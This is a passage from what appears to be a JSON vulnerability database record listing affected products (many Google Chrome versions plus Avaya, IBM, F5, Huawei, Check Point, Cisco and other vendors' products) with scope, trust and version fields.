"scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "gaia embedded r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visualization fault and performance manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "gtsoftx3000 v200r001c01sph106", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.190.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.05.00" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.400.0" }, { "model": "vertica", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.0" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.74" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.592.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.26" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "storeever esl e-series tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.902.0" }, { "model": "telepresence multipoint switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "ipso r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "oceanstor s3900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.39" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.0" }, { "model": "fusionstorage dsware v100r003c02spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.548.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.640.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.23" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.18" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.110" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.514" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.759.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.1" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.84" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.59" }, { "model": "oceanstor s5800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "n series oncommand 6.1r1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.42" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "e6000 blade server bh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.56" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.69" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.30" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.149" }, { "model": "gaia r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.833.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.47" }, { "model": "gaia r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.119" }, { "model": "vcenter hyperic server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.2" }, { "model": "vcenter operations manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.810.0" }, { "model": "ipso r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "gaia ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.23" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.31" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.41" }, { "model": "system storage san40b-4 2498-b40", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.649.0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.78" }, { "model": "oceanstor s5600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.1" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.316.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.9" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.90" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.692.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.7" }, { "model": "universal small cell cloudbase", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11" }, { "model": "cloudsystem foundation", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.639.0" }, { "model": "wireless lan wos with aos", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "91007.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.98" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.630.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.0" }, { "model": "telepresence recording server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.885.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.52" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "ipso r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.569.0" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.962.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.318.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.619.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.14" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.63" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "t620 flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.6" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7835" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1004" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.86" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1033" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.100" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3050" }, { "model": "secureplatform r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1044" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1679.0" }, { "model": "secureplatform r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7225" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.56" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11.3" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.539.0" }, { "model": "e6000 blade server bh622 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.661.0" }, { "model": "insight control for linux central management", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.91" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.474.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.1" }, { "model": "audit vault and database firewall", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "vertica", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1-0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.42" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.1" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.883.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.306" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.62" }, { "model": "galax8800 v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.348.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.515" }, { "model": "life cycle management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.62" }, { "model": "t410 smart zero client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.7" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.705.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.122" }, { "model": "application dependency planner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.395.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1016.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": 